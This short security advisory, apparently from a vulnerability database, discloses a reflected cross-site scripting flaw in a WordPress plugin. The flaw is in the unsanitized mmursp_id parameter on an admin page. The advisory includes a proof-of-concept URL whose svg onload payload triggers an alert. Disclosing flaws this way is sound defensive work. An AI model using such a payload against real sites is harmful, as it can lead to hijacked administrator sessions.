The plugin does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting.
https://example.com/wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id="><svg onload=alert(/XSS/)>